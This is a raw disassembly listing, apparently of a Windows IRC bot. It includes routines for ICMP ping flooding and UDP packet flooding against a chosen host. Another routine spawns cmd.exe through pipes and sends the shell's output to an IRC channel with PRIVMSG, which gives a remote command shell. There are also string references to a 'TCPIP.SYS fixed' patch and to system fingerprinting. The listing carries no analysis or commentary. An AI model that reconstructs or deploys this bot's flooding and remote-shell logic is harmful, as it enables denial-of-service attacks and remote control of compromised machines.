push [ebp+eax+var_30]
push [ebp+arg_0]
call sub_4183EE
push [ebp+arg_0]
push esi
push esi
push [ebp+var_C]
call sub_418132
mov eax, [ebp+var_4]
push esi
push [ebp+eax+var_70]
push [ebp+var_C]
call sub_418480
add esp, 28h
test eax, eax
jnz short loc_40B2BD
inc [ebp+var_8]
loc_40B2BD: ; CODE XREF: sub_40B0E7+1D1�j
add [ebp+var_4], 4
cmp [ebp+var_4], 20h
jl short loc_40B286
cmp [ebp+var_8], 8
jge loc_40B3AE
mov [ebp+var_10], esi
loc_40B2D4: ; CODE XREF: sub_40B0E7+212�j
push 0
push [ebp+ebx+var_30]
push [ebp+arg_0]
call sub_4183EE
push [ebp+arg_0]
push esi
push esi
push [ebp+ebx+var_70]
call sub_4188AC
add ebx, 4
add esp, 1Ch
cmp ebx, 20h
jl short loc_40B2D4
jmp loc_40B3AC
; ---------------------------------------------------------------------------
loc_40B300: ; CODE XREF: sub_40B0E7+157�j
mov [ebp+var_30], 130h
mov [ebp+var_2C], 131h
mov [ebp+var_28], 132h
mov [ebp+var_24], 133h
mov [ebp+var_20], 4F322h
mov [ebp+var_1C], 4F323h
mov [ebp+var_18], 4F324h
mov [ebp+var_14], 4F325h
mov [ebp+var_4], ebx
loc_40B33B: ; CODE XREF: sub_40B0E7+293�j
mov eax, [ebp+var_4]
push ebx
push [ebp+eax+var_30]
push [ebp+arg_0]
call sub_4183EE
push [ebp+arg_0]
push esi
push esi
push [ebp+var_C]
call sub_418132
mov eax, [ebp+var_4]
push esi
push [ebp+eax+var_50]
push [ebp+var_C]
call sub_418480
add esp, 28h
test eax, eax
jnz short loc_40B372
inc [ebp+var_8]
loc_40B372: ; CODE XREF: sub_40B0E7+286�j
add [ebp+var_4], 4
cmp [ebp+var_4], 20h
jl short loc_40B33B
cmp [ebp+var_8], 8
jge short loc_40B3AE
mov [ebp+var_10], esi
loc_40B385: ; CODE XREF: sub_40B0E7+2C3�j
push 0
push [ebp+ebx+var_30]
push [ebp+arg_0]
call sub_4183EE
push [ebp+arg_0]
push esi
push esi
push [ebp+ebx+var_50]
call sub_4188AC
add ebx, 4
add esp, 1Ch
cmp ebx, 20h
jl short loc_40B385
loc_40B3AC: ; CODE XREF: sub_40B0E7+214�j
xor ebx, ebx
loc_40B3AE: ; CODE XREF: sub_40B0E7+15E�j
; sub_40B0E7+1E4�j ...
push [ebp+arg_0]
call sub_4180DC
pop ecx
lea eax, [ebp+var_198]
push ebx
push edi
push 3
push ebx
push 2
push 40000000h
push eax
nop
call near ptr 7C801A24h
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_40B3F4
lea eax, [ebp+var_80]
push eax
lea eax, [ebp+var_78]
push eax
lea eax, [ebp+var_88]
push eax
push esi
nop
call near ptr 7C831CB8h
push esi
nop
call near ptr 7C809B47h
loc_40B3F4: ; CODE XREF: sub_40B0E7+2EE�j
cmp [ebp+var_10], ebx
jz short loc_40B442
push [ebp+var_94]
lea eax, [ebp+var_3A0]
push offset aTcpip_sysFixed ; "TCPIP.SYS fixed, version %d."
push 200h
push eax
call sub_41792A
push ebx
lea eax, [ebp+var_3A0]
push [ebp+var_90]
push eax
push offset aSodoma_3t ; "##sodoma_3t"
push [ebp+var_1A0]
call sub_40DC10
lea eax, [ebp+var_3A0]
push eax
call sub_40C4F7
add esp, 28h
loc_40B442: ; CODE XREF: sub_40B0E7+310�j
push [ebp+var_19C]
mov dword_42ED0C, ebx
call sub_417174
pop ecx
push ebx
nop
call near ptr 7C80C058h
sub_40B0E7 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B45B proc near ; DATA XREF: sub_40F6F1+2F57�o
var_10320 = byte ptr -10320h
var_344 = byte ptr -344h
var_144 = dword ptr -144h
var_140 = byte ptr -140h
var_C0 = byte ptr -0C0h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = byte ptr -20h
var_18 = dword ptr -18h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 10320h
call sub_417B70
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 49h
mov esi, eax
pop ecx
lea edi, [ebp+var_144]
rep movsd
push 1
pop edi
mov [eax+120h], edi
call dword_441344 ; IcmpCreateFile
mov [ebp+arg_0], eax
lea eax, [ebp+var_C0]
push eax
call dword_4413F8 ; inet_addr
mov esi, eax
xor ebx, ebx
xor eax, eax
cmp esi, 0FFFFFFFFh
jnz short loc_40B4B6
lea eax, [ebp+var_C0]
push eax
call dword_44143C ; gethostbyname
cmp eax, ebx
jz short loc_40B4BC
loc_40B4B6: ; CODE XREF: sub_40B45B+48�j
cmp [ebp+arg_0], 0FFFFFFFFh
jnz short loc_40B519
loc_40B4BC: ; CODE XREF: sub_40B45B+59�j
lea eax, [ebp+var_C0]
push eax
lea eax, [ebp+var_344]
push offset unk_42D1E4
push eax
call sub_4173AC
add esp, 0Ch
cmp [ebp+var_28], ebx
jnz short loc_40B4FC
push ebx
lea eax, [ebp+var_344]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_140]
push eax
push [ebp+var_144]
call sub_40DC10
add esp, 14h
loc_40B4FC: ; CODE XREF: sub_40B45B+7F�j
lea eax, [ebp+var_344]
push eax
call sub_40C4F7
push [ebp+var_30]
call sub_417174
pop ecx
pop ecx
push edi
nop
call near ptr 7C80C058h
loc_40B519: ; CODE XREF: sub_40B45B+5F�j
cmp eax, ebx
jz short loc_40B529
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_4], eax
jmp short loc_40B52C
; ---------------------------------------------------------------------------
loc_40B529: ; CODE XREF: sub_40B45B+C0�j
mov [ebp+var_4], esi
loc_40B52C: ; CODE XREF: sub_40B45B+CC�j
push 1Ch
lea eax, [ebp+var_20]
push ebx
push eax
call sub_417430
or [ebp+var_18], 0FFFFFFFFh
mov eax, 0FFDCh
add esp, 0Ch
cmp [ebp+var_3C], eax
jle short loc_40B54C
mov [ebp+var_3C], eax
loc_40B54C: ; CODE XREF: sub_40B45B+EC�j
cmp [ebp+var_38], edi
jge short loc_40B554
mov [ebp+var_38], edi
loc_40B554: ; CODE XREF: sub_40B45B+F4�j
xor esi, esi
cmp [ebp+var_40], ebx
jle short loc_40B581
loc_40B55B: ; CODE XREF: sub_40B45B+124�j
push [ebp+var_38]
lea eax, [ebp+var_20]
push 1Ch
push eax
push ebx
lea eax, [ebp+var_10320]
push [ebp+var_3C]
push eax
push [ebp+var_4]
push [ebp+arg_0]
call dword_4412DC ; IcmpSendEcho
inc esi
cmp esi, [ebp+var_40]
jl short loc_40B55B
loc_40B581: ; CODE XREF: sub_40B45B+FE�j
push [ebp+arg_0]
call dword_441470 ; IcmpCloseHandle
lea eax, [ebp+var_C0]
push eax
lea eax, [ebp+var_344]
push offset unk_42D1A8
push eax
call sub_4173AC
add esp, 0Ch
cmp [ebp+var_28], ebx
jnz short loc_40B5CA
push ebx
lea eax, [ebp+var_344]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_140]
push eax
push [ebp+var_144]
call sub_40DC10
add esp, 14h
loc_40B5CA: ; CODE XREF: sub_40B45B+14D�j
lea eax, [ebp+var_344]
push eax
call sub_40C4F7
push [ebp+var_30]
call sub_417174
pop ecx
pop ecx
push ebx
nop
call near ptr 7C80C058h
sub_40B45B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B5E7 proc near ; DATA XREF: sub_40F6F1+3092�o
var_10312 = byte ptr -10312h
var_10310 = byte ptr -10310h
var_334 = byte ptr -334h
var_134 = dword ptr -134h
var_130 = byte ptr -130h
var_B0 = byte ptr -0B0h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 10310h
call sub_417B70
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 49h
mov esi, eax
pop ecx
lea edi, [ebp+var_134]
rep movsd
push 1
pop esi
mov [eax+120h], esi
nop
call near ptr 7C80929Ch
push eax
call sub_4173FE
pop ecx
push 11h
push 2
push 2
call dword_441438 ; socket
mov ebx, eax
xor edi, edi
push 10h
lea eax, [ebp+var_10]
push edi
push eax
call sub_417430
add esp, 0Ch
lea eax, [ebp+var_B0]
mov [ebp+var_10], 2
push eax
call dword_4413F8 ; inet_addr
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jnz short loc_40B6CC
lea eax, [ebp+var_B0]
push eax
call dword_44143C ; gethostbyname
cmp eax, edi
jnz short loc_40B6C5
lea eax, [ebp+var_B0]
push eax
lea eax, [ebp+var_334]
push offset dword_42D258
push eax
call sub_4173AC
add esp, 0Ch
cmp [ebp+var_18], edi
jnz short loc_40B6A8
push edi
lea eax, [ebp+var_334]
push [ebp+var_1C]
push eax
lea eax, [ebp+var_130]
push eax
push [ebp+var_134]
call sub_40DC10
add esp, 14h
loc_40B6A8: ; CODE XREF: sub_40B5E7+9F�j
lea eax, [ebp+var_334]
push eax
call sub_40C4F7
push [ebp+var_20]
call sub_417174
pop ecx
pop ecx
push esi
nop
call near ptr 7C80C058h
loc_40B6C5: ; CODE XREF: sub_40B5E7+7F�j
mov eax, [eax+0Ch]
mov eax, [eax]
jmp short loc_40B6CF
; ---------------------------------------------------------------------------
loc_40B6CC: ; CODE XREF: sub_40B5E7+6E�j
lea eax, [ebp+arg_0]
loc_40B6CF: ; CODE XREF: sub_40B5E7+E3�j
mov eax, [eax]
cmp [ebp+var_24], edi
mov [ebp+var_C], eax
jnz short loc_40B6EA
call sub_417408
cdq
mov ecx, 0FFDCh
idiv ecx
inc edx
push edx
jmp short loc_40B6ED
; ---------------------------------------------------------------------------
loc_40B6EA: ; CODE XREF: sub_40B5E7+F0�j
push [ebp+var_24]
loc_40B6ED: ; CODE XREF: sub_40B5E7+101�j
call dword_4413B8 ; ntohs
cmp [ebp+var_24], esi
mov [ebp+var_E], ax
jge short loc_40B6FF
mov [ebp+var_24], esi
loc_40B6FF: ; CODE XREF: sub_40B5E7+113�j
mov eax, 0FFFFh
cmp [ebp+var_24], eax
jle short loc_40B70C
mov [ebp+var_24], eax
loc_40B70C: ; CODE XREF: sub_40B5E7+120�j
mov eax, [ebp+var_30]
push 0Ah
cdq
pop ecx
idiv ecx
cmp [ebp+var_28], edi
mov [ebp+var_30], eax
jnz short loc_40B720
mov [ebp+var_28], esi
loc_40B720: ; CODE XREF: sub_40B5E7+134�j
xor esi, esi
cmp [ebp+var_2C], edi
jle short loc_40B741
loc_40B727: ; CODE XREF: sub_40B5E7+158�j
call sub_417408
cdq
mov ecx, 0FFh
idiv ecx
inc esi
cmp esi, [ebp+var_2C]
mov [ebp+esi-10311h], dl
jl short loc_40B727
loc_40B741: ; CODE XREF: sub_40B5E7+13E�j
; sub_40B5E7+19C�j ...
mov eax, [ebp+var_30]
dec [ebp+var_30]
test eax, eax
jle short loc_40B7A0
push 0Bh
pop esi
loc_40B74E: ; CODE XREF: sub_40B5E7+197�j
lea eax, [ebp+var_10]
push 10h
push eax
push edi
call sub_417408
push 0Ah
cdq
pop ecx
idiv ecx
mov eax, [ebp+var_2C]
sub eax, edx
push eax
lea eax, [ebp+var_10310]
push eax
push ebx
call dword_44141C ; sendto
push [ebp+var_28]
nop
call near ptr 7C802442h
dec esi
jnz short loc_40B74E
cmp [ebp+var_24], edi
jnz short loc_40B741
call sub_417408
cdq
mov ecx, 0FFDCh
idiv ecx
inc edx
push edx
call dword_4413B8 ; ntohs
mov [ebp+var_E], ax
jmp short loc_40B741
; ---------------------------------------------------------------------------
loc_40B7A0: ; CODE XREF: sub_40B5E7+162�j
lea eax, [ebp+var_B0]
push eax
lea eax, [ebp+var_334]
push offset dword_42D21C
push eax
call sub_4173AC
add esp, 0Ch
cmp [ebp+var_18], edi
jnz short loc_40B7E0
push edi
lea eax, [ebp+var_334]
push [ebp+var_1C]
push eax
lea eax, [ebp+var_130]
push eax
push [ebp+var_134]
call sub_40DC10
add esp, 14h
loc_40B7E0: ; CODE XREF: sub_40B5E7+1D7�j
lea eax, [ebp+var_334]
push eax
call sub_40C4F7
push [ebp+var_20]
call sub_417174
pop ecx
pop ecx
push edi
nop
call near ptr 7C80C058h
sub_40B5E7 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40B7FD proc near ; CODE XREF: sub_40B82D+2A�p
; sub_40B865+7E�p ...
mov eax, dword_441708
push esi
mov esi, dword_42107C
cmp eax, 0FFFFFFFFh
jz short loc_40B811
push eax
call esi ; CloseHandle
loc_40B811: ; CODE XREF: sub_40B7FD+F�j
mov eax, dword_441710
cmp eax, 0FFFFFFFFh
jz short loc_40B81E
push eax
call esi ; CloseHandle
loc_40B81E: ; CODE XREF: sub_40B7FD+1C�j
mov eax, dword_441704
cmp eax, 0FFFFFFFFh
jz short loc_40B82B
push eax
call esi ; CloseHandle
loc_40B82B: ; CODE XREF: sub_40B7FD+29�j
pop esi
retn
sub_40B7FD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B82D proc near ; CODE XREF: sub_40C8F3+14A�p
; sub_40F6F1+4B0F�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push [ebp+arg_0]
call sub_417AF0
pop ecx
mov [ebp+var_4], eax
lea ecx, [ebp+var_4]
push 0
push ecx
push eax
push [ebp+arg_0]
push dword_44170C
nop
call near ptr 7C810D87h
test eax, eax
jnz short loc_40B860
call sub_40B7FD
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_40B860: ; CODE XREF: sub_40B82D+28�j
push 1
pop eax
leave
retn
sub_40B82D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B865 proc near ; CODE XREF: sub_40B8EC+D3�p
; sub_40B8EC+F2�p ...
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
push offset byte_43C63C
push [ebp+arg_4]
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz short loc_40B8A8
push 7D0h
nop
call near ptr 7C802442h
push [ebp+arg_8]
lea eax, [ebp+var_200]
push [ebp+arg_4]
push offset aPrivmsgSS ; "PRIVMSG %s :%s\r"
push eax
call sub_4173AC
add esp, 10h
jmp short loc_40B8BF
; ---------------------------------------------------------------------------
loc_40B8A8: ; CODE XREF: sub_40B865+1A�j
push [ebp+arg_8]
lea eax, [ebp+var_200]
push offset dword_42433C
push eax
call sub_4173AC
add esp, 0Ch
loc_40B8BF: ; CODE XREF: sub_40B865+41�j
lea eax, [ebp+var_200]
push 0
push eax
call sub_417AF0
pop ecx
push eax
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call dword_441408 ; send
test eax, eax
jg short loc_40B8E8
call sub_40B7FD
loc_40B8E8: ; CODE XREF: sub_40B865+7C�j
xor eax, eax
leave
retn
sub_40B865 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B8EC proc near ; DATA XREF: sub_40BA41+170�o
var_20C = byte ptr -20Ch
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 20Ch
push ebx
push esi
push edi
mov esi, 200h
xor edi, edi
mov ebx, offset dword_441714
loc_40B904: ; CODE XREF: sub_40B8EC+79�j
; sub_40B8EC+DB�j
push esi
lea eax, [ebp+var_20C]
push edi
push eax
call sub_417430
add esp, 0Ch
lea eax, [ebp+var_4]
push edi
push edi
push eax
lea eax, [ebp+var_20C]
push esi
push eax
push dword_441708
nop
call near ptr 7C85F90Fh
test eax, eax
jz loc_40B9D2
cmp [ebp+var_4], edi
jnz short loc_40B967
lea eax, [ebp+var_8]
push eax
push dword_441704
nop
call near ptr 7C81AE17h
test eax, eax
jz short loc_40B95D
cmp [ebp+var_8], 103h
jnz loc_40B9F6
loc_40B95D: ; CODE XREF: sub_40B8EC+62�j
push 0Ah
nop
call near ptr 7C802442h
jmp short loc_40B904
; ---------------------------------------------------------------------------
loc_40B967: ; CODE XREF: sub_40B8EC+4E�j
xor eax, eax
cmp [ebp+var_4], edi
jbe short loc_40B97E
loc_40B96E: ; CODE XREF: sub_40B8EC+90�j
cmp [ebp+eax+var_20C], 0Ah
jz short loc_40B9CC
inc eax
cmp eax, [ebp+var_4]
jb short loc_40B96E
loc_40B97E: ; CODE XREF: sub_40B8EC+80�j
mov [ebp+var_4], esi
loc_40B981: ; CODE XREF: sub_40B8EC+E4�j
push esi
lea eax, [ebp+var_20C]
push edi
push eax
call sub_417430
add esp, 0Ch
lea eax, [ebp+var_C]
push edi
push eax
push [ebp+var_4]
lea eax, [ebp+var_20C]
push eax
push dword_441708
nop
call near ptr 7C80180Eh
test eax, eax
jz short loc_40BA1E
lea eax, [ebp+var_20C]
push eax
push ebx
push dword_441748
call sub_40B865
add esp, 0Ch
jmp loc_40B904
; ---------------------------------------------------------------------------
loc_40B9CC: ; CODE XREF: sub_40B8EC+8A�j
inc eax
mov [ebp+var_4], eax
jmp short loc_40B981
; ---------------------------------------------------------------------------
loc_40B9D2: ; CODE XREF: sub_40B8EC+45�j
push offset dword_42D318
push ebx
push dword_441748
call sub_40B865
push [ebp+arg_0]
call sub_417174
add esp, 10h
push 1
nop
call near ptr 7C80C058h
loc_40B9F6: ; CODE XREF: sub_40B8EC+6B�j
call sub_40B7FD
push offset dword_42D2E0
push ebx
push dword_441748
call sub_40B865
push [ebp+arg_0]
call sub_417174
add esp, 10h
push edi
nop
call near ptr 7C80C058h
loc_40BA1E: ; CODE XREF: sub_40B8EC+C3�j
push offset dword_42D2A0
push ebx
push dword_441748
call sub_40B865
push [ebp+arg_0]
call sub_417174
add esp, 10h
push edi
nop
call near ptr 7C80C058h
sub_40B8EC endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BA41 proc near ; CODE XREF: sub_40C8F3+99�p
; sub_40F6F1+58A4�p
var_378 = byte ptr -378h
var_178 = byte ptr -178h
var_74 = dword ptr -74h
var_48 = dword ptr -48h
var_44 = word ptr -44h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = byte ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 378h
push ebx
push esi
push edi
call sub_40B7FD
xor esi, esi
lea eax, [ebp+var_178]
push esi
push eax
push 104h
push esi
push offset aCmd_exe ; "cmd.exe"
push esi
call dword_441474 ; SearchPathA
test eax, eax
jz loc_40BB3B
push 1
lea eax, [ebp+var_1C]
pop ebx
mov edi, dword_421144
push esi
push eax
lea eax, [ebp+var_C]
mov [ebp+var_1C], 0Ch
push eax
lea eax, [ebp+var_10]
push eax
mov [ebp+var_14], ebx
mov [ebp+var_18], esi
call edi ; CreatePipe
test eax, eax
jz loc_40BB3B
lea eax, [ebp+var_1C]
push esi
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
call edi ; CreatePipe
test eax, eax
jz loc_40BB3B
mov edi, dword_421140
push 3
push esi
push esi
push offset dword_44170C
call edi ; GetCurrentProcess
push eax
push [ebp+var_8]
call edi ; GetCurrentProcess
push eax
nop
call near ptr 7C80DDFEh
test eax, eax
jz short loc_40BB3B
push 10h
lea eax, [ebp+var_2C]
push esi
push eax
call sub_417430
push 44h
lea eax, [ebp+var_74]
pop edi
push edi
push esi
push eax
call sub_417430
mov eax, [ebp+var_4]
add esp, 18h
mov [ebp+var_3C], eax
mov eax, [ebp+var_C]
mov [ebp+var_38], eax
mov [ebp+var_34], eax
lea eax, [ebp+var_2C]
mov [ebp+var_74], edi
push eax
lea eax, [ebp+var_74]
push eax
push esi
push esi
push esi
push ebx
push esi
mov ebx, offset byte_43C63C
push esi
lea eax, [ebp+var_178]
push ebx
push eax
mov [ebp+var_48], 101h
mov [ebp+var_44], si
nop
call near ptr 7C802367h
test eax, eax
jnz short loc_40BB43
loc_40BB3B: ; CODE XREF: sub_40BA41+2F�j
; sub_40BA41+5C�j ...
or eax, 0FFFFFFFFh
jmp loc_40BBF1
; ---------------------------------------------------------------------------
loc_40BB43: ; CODE XREF: sub_40BA41+F8�j
push [ebp+var_4]
mov edi, dword_42107C
call edi ; CloseHandle
mov eax, [ebp+var_10]
push [ebp+var_28]
mov dword_441708, eax
mov eax, [ebp+var_8]
mov dword_441710, eax
mov eax, [ebp+var_2C]
mov dword_441704, eax
call edi ; CloseHandle
mov eax, [ebp+arg_0]
cmp [ebp+arg_4], esi
mov dword_441748, eax
jz short loc_40BB7D
push [ebp+arg_4]
jmp short loc_40BB7E
; ---------------------------------------------------------------------------
loc_40BB7D: ; CODE XREF: sub_40BA41+135�j
push ebx
loc_40BB7E: ; CODE XREF: sub_40BA41+13A�j
push offset dword_441714
call sub_4173AC
pop ecx
pop ecx
push esi
push 7
push offset dword_42D39C
call sub_416E58
mov edi, eax
mov ecx, [ebp+var_24]
imul edi, 234h
add esp, 0Ch
mov dword_446E18[edi], ecx
lea ecx, [ebp+var_30]
push ecx
push esi
push eax
push offset sub_40B8EC
push esi
push esi
nop
call near ptr 7C810637h
cmp eax, esi
mov dword_446E24[edi], eax
jnz short loc_40BBEF
nop
call near ptr 7C910331h
push eax
lea eax, [ebp+var_378]
push offset dword_42D358
push eax
call sub_4173AC
lea eax, [ebp+var_378]
push eax
call sub_40C4F7
add esp, 10h
loc_40BBEF: ; CODE XREF: sub_40BA41+185�j
xor eax, eax
loc_40BBF1: ; CODE XREF: sub_40BA41+FD�j
pop edi
pop esi
pop ebx
leave
retn
sub_40BA41 endp
; =============== S U B R O U T I N E =======================================
sub_40BBF6 proc near ; CODE XREF: sub_40707C+74�p
; sub_40BDAD+217�p ...
arg_0 = dword ptr 4
push ebx
push ebp
push esi
push edi
nop
call near ptr 7C80929Ch
xor edx, edx
mov ecx, 3E8h
div ecx
mov ebx, 15180h
xor edx, edx
mov esi, ebx
mov edi, 0E10h
mov ebp, edi
push 3Ch
mov ecx, eax
sub ecx, [esp+14h+arg_0]
mov eax, ecx
div esi
mov esi, edx
xor edx, edx
mov eax, esi
div ebp
pop ebp
mov eax, edx
xor edx, edx
div ebp
xor edx, edx
push eax
mov eax, esi
div edi
xor edx, edx
mov esi, offset dword_441750
push eax
mov eax, ecx
div ebx
push eax
push offset aDdDhDm ; "%dd %dh %dm"
push 32h
push esi
call sub_41792A
add esp, 18h
mov eax, esi
pop edi
pop esi
pop ebp
pop ebx
retn
sub_40BBF6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BC5F proc near ; CODE XREF: sub_408FAC+24�p
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_84 = dword ptr -84h
push ebp
mov ebp, esp
sub esp, 94h
lea eax, [ebp+var_94]
push esi
push eax
xor esi, esi
mov [ebp+var_94], 94h
nop
call near ptr 7C812ADEh
test eax, eax
jz short loc_40BCF2
cmp [ebp+var_90], 4
jnz short loc_40BCC8
cmp [ebp+var_8C], esi
jnz short loc_40BCB0
cmp [ebp+var_84], 1
jnz short loc_40BCA3
push 1
pop esi
loc_40BCA3: ; CODE XREF: sub_40BC5F+3F�j
cmp [ebp+var_84], 2
jnz short loc_40BCF2
push 1
jmp short loc_40BCF1
; ---------------------------------------------------------------------------
loc_40BCB0: ; CODE XREF: sub_40BC5F+36�j
cmp [ebp+var_8C], 0Ah
jnz short loc_40BCBD
loc_40BCB9: ; CODE XREF: sub_40BC5F+78�j
push 2
jmp short loc_40BCF1
; ---------------------------------------------------------------------------
loc_40BCBD: ; CODE XREF: sub_40BC5F+58�j
cmp [ebp+var_8C], 5Ah
jnz short loc_40BCF2
jmp short loc_40BCE2
; ---------------------------------------------------------------------------
loc_40BCC8: ; CODE XREF: sub_40BC5F+2E�j
cmp [ebp+var_90], 5
jnz short loc_40BCF2
cmp [ebp+var_8C], esi
jz short loc_40BCB9
cmp [ebp+var_8C], 1
jnz short loc_40BCE6
loc_40BCE2: ; CODE XREF: sub_40BC5F+67�j
push 3
jmp short loc_40BCF1
; ---------------------------------------------------------------------------
loc_40BCE6: ; CODE XREF: sub_40BC5F+81�j
cmp [ebp+var_8C], 2
jnz short loc_40BCF2
push 7
loc_40BCF1: ; CODE XREF: sub_40BC5F+4F�j
; sub_40BC5F+5C�j ...
pop esi
loc_40BCF2: ; CODE XREF: sub_40BC5F+25�j
; sub_40BC5F+4B�j ...
mov eax, esi
pop esi
leave
retn
sub_40BC5F endp
; =============== S U B R O U T I N E =======================================
sub_40BCF7 proc near ; CODE XREF: sub_40BDAD+290�p
push ebx
push esi
push edi
mov esi, 0F4240h
loc_40BCFF: ; CODE XREF: sub_40BCF7+2F�j
; sub_40BCF7+35�j
rdtsc
push 3E8h
mov edi, edx
mov ebx, eax
nop
call near ptr 7C802442h
rdtsc
sub eax, ebx
push 0
sbb edx, edi
push esi
push edx
push eax
call sub_418A40
mov edi, edx
mov ebx, eax
test edi, edi
ja short loc_40BCFF
jb short loc_40BD2E
cmp ebx, esi
ja short loc_40BCFF
loc_40BD2E: ; CODE XREF: sub_40BCF7+31�j
push 0
push 64h
push edi
push ebx
call sub_4189C0
mov ecx, edx
push 64h
xor edx, edx
mov esi, eax
test ecx, ecx
pop eax
ja short loc_40BDA1
jb short loc_40BD4D
cmp esi, 50h
jnb short loc_40BD52
loc_40BD4D: ; CODE XREF: sub_40BCF7+4F�j
push 4Bh
xor edx, edx
pop eax
loc_40BD52: ; CODE XREF: sub_40BCF7+54�j
test ecx, ecx
ja short loc_40BDA1
jb short loc_40BD5D
cmp esi, 47h
jnb short loc_40BD62
loc_40BD5D: ; CODE XREF: sub_40BCF7+5F�j
push 42h
xor edx, edx
pop eax
loc_40BD62: ; CODE XREF: sub_40BCF7+64�j
test ecx, ecx
ja short loc_40BDA1
jb short loc_40BD6D
cmp esi, 37h
jnb short loc_40BD72
loc_40BD6D: ; CODE XREF: sub_40BCF7+6F�j
push 32h
xor edx, edx
pop eax
loc_40BD72: ; CODE XREF: sub_40BCF7+74�j
test ecx, ecx
ja short loc_40BDA1
jb short loc_40BD7D
cmp esi, 26h
jnb short loc_40BD82
loc_40BD7D: ; CODE XREF: sub_40BCF7+7F�j
push 21h
xor edx, edx
pop eax
loc_40BD82: ; CODE XREF: sub_40BCF7+84�j
test ecx, ecx
ja short loc_40BDA1
jb short loc_40BD8D
cmp esi, 1Eh
jnb short loc_40BD92
loc_40BD8D: ; CODE XREF: sub_40BCF7+8F�j
push 19h
xor edx, edx
pop eax
loc_40BD92: ; CODE XREF: sub_40BCF7+94�j
test ecx, ecx
ja short loc_40BDA1
jb short loc_40BD9D
cmp esi, 0Ah
jnb short loc_40BDA1
loc_40BD9D: ; CODE XREF: sub_40BCF7+9F�j
xor eax, eax
xor edx, edx
loc_40BDA1: ; CODE XREF: sub_40BCF7+4D�j
; sub_40BCF7+5D�j ...
sub eax, esi
sbb edx, ecx
add eax, ebx
adc edx, edi
pop edi
pop esi
pop ebx
retn
sub_40BCF7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BDAD proc near ; CODE XREF: sub_40F6F1+5B1B�p
var_7E8 = byte ptr -7E8h
var_668 = byte ptr -668h
var_5E8 = byte ptr -5E8h
var_568 = byte ptr -568h
var_4E8 = byte ptr -4E8h
var_3E4 = byte ptr -3E4h
var_2E8 = byte ptr -2E8h
var_25C = word ptr -25Ch
var_25A = byte ptr -25Ah
var_15C = byte ptr -15Ch
var_114 = byte ptr -114h
var_CC = dword ptr -0CCh
var_C8 = dword ptr -0C8h
var_C4 = dword ptr -0C4h
var_C0 = dword ptr -0C0h
var_BC = dword ptr -0BCh
var_B8 = byte ptr -0B8h
var_38 = byte ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_18 = byte ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 7E8h
push ebx
push esi
lea eax, [ebp+var_CC]
push edi
push eax
mov [ebp+var_4], offset byte_43C63C
mov [ebp+var_CC], 94h
nop
call near ptr 7C812ADEh
xor ebx, ebx
cmp [ebp+var_C8], 4
jnz short loc_40BE34
cmp [ebp+var_C4], ebx
jnz short loc_40BE10
cmp [ebp+var_BC], 1
jnz short loc_40BDFA
mov [ebp+var_4], offset a95 ; "95"
loc_40BDFA: ; CODE XREF: sub_40BDAD+44�j
cmp [ebp+var_BC], 2
jnz loc_40BEAF
mov [ebp+var_4], offset aNt ; "NT"
jmp short loc_40BE80
; ---------------------------------------------------------------------------
loc_40BE10: ; CODE XREF: sub_40BDAD+3B�j
cmp [ebp+var_C4], 0Ah
jnz short loc_40BE22
mov [ebp+var_4], offset a98 ; "98"
jmp short loc_40BE77
; ---------------------------------------------------------------------------
loc_40BE22: ; CODE XREF: sub_40BDAD+6A�j
